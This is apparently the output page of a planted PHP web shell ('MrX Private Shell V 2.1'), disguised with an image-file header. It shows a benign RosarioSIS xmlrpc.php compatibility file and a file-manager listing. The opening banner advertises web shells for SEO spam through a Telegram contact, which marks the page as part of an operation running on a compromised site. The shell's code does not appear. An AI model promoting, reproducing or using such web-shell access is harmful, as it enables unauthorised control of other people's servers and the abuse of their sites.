����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Implementation for PHP xmlrpc extension functions not included by default.
* PHP8 has dropped support for xmlrpc extension.
*
* @since 7.6
*
* @package RosarioSIS
* @subpackage ProgramFunctions
*/
// @since 7.6 PHP8 no xmlrpc ext: load XML_RPC compat classes.
require_once 'classes/PHPCompatibility/Xmlrpc/XML_RPC.php';
require_once 'classes/PHPCompatibility/Xmlrpc/XmlrpcDecoder.php';
require_once 'classes/PHPCompatibility/Xmlrpc/XmlrpcEncoder.php';
if ( ! function_exists( 'xmlrpc_decode' ) ) :
function xmlrpc_decode( $xml, $encoding = 'iso-8859-1' )
{
return XML_RPC::xmlrpc_decode( $xml, $encoding );
}
endif;
if ( ! function_exists( 'xmlrpc_is_fault' ) ) :
function xmlrpc_is_fault( $arg )
{
return XML_RPC::xmlrpc_is_fault( $arg );
}
endif;
if ( ! function_exists( 'xmlrpc_encode_request' ) ) :
function xmlrpc_encode_request( $method, $params, $options = [] )
{
return XML_RPC::xmlrpc_encode_request( $method, $params, $options );
}
endif;
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| xmlrpc.php | File | 994 B | 0644 |
|